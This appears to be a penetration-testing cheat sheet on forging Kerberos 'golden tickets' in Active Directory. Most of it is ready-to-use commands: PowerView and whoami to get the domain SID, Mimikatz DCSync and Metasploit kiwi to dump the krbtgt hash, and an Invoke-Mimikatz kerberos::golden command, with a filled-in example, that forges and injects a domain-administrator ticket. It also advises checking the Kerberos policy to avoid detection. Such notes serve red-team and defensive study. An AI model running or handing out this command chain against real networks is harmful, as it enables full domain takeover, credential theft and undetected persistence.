# Golden ticket

A golden ticket is a forged TGT created with a stolen KDC key. A golden ticket enables the attacker to create a fake domain administrator identity to gain access to any service on a domain.

The KDC automatically trusts a TGT that is encrypted with a KDC key.

## Information needed to create a golden ticket

* Domain Name
* Domain SID
* Username to impersonate
* krbtgt NTLM hash

## Obtaining the domain information and sid

### With PowerView

```powershell
Get-DomainSID
```

### With domain user account

```powershell
whoami /user
```

## Obtaining krbtgt hash

### Using Mimikatz

The DCSync is a mimikatz feature which will try to impersonate a domain controller and request account password information from the targeted domain controller. This technique is less noisy as it doesn’t require direct access to the domain controller or retrieving the NTDS.DIT file over the network.

```powershell
lsadump::dcsync /user:krbtgt
```

### Metasploit kiwi module

```powershell
dcsync_ntlm krbtgt
```

## Generating a golden ticket&#x20;

> It's important to note down the domain kerberos policy to avoid detection

```powershell
Invoke-Mimikatz -Command '"kerberos::golden /user:[impersonating user] /domain:[domain] /sid:[domain sid] /krbtgt:[krbtgt hash] /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
```

> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:msp.local /sid:S-1-5-21-2998733414-582960673-4099777928 /krbtgt:aae39b0f0f043e3a7eefc88a13560c80 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'